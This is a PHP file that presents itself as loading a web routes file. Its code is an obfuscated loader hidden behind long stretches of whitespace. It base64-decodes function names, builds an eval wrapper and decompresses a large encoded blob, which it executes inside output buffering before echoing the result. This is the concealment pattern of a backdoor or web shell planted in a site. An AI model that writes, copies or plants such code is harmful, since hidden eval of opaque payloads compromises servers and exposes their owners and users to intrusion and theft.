<?php 
        $__='printf';$_='Loading routes/web.php';
        



























































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      


























































































































































                                                                                                                                                                                                                     $________;
